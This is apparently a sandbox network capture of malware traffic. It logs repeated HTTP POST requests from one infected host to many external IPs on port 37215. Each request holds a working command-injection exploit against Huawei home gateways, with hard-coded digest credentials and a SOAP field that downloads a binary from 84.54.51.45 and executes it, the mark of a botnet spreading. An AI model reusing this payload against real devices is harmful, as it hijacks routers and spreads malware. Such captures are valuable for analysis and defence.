                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2206192.168.2.156095441.72.51.2837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671854973 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2207192.168.2.155095641.10.34.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671858072 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2208192.168.2.156023041.243.184.12237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671895027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2209192.168.2.154396241.90.1.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671895027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2210192.168.2.154953041.145.39.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671896935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2211192.168.2.154380841.146.14.4237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672256947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2212192.168.2.153752641.240.171.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672275066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2213192.168.2.153769441.165.124.16837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672275066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2214192.168.2.154949641.99.11.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672313929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2215192.168.2.154294641.130.186.9437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672314882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 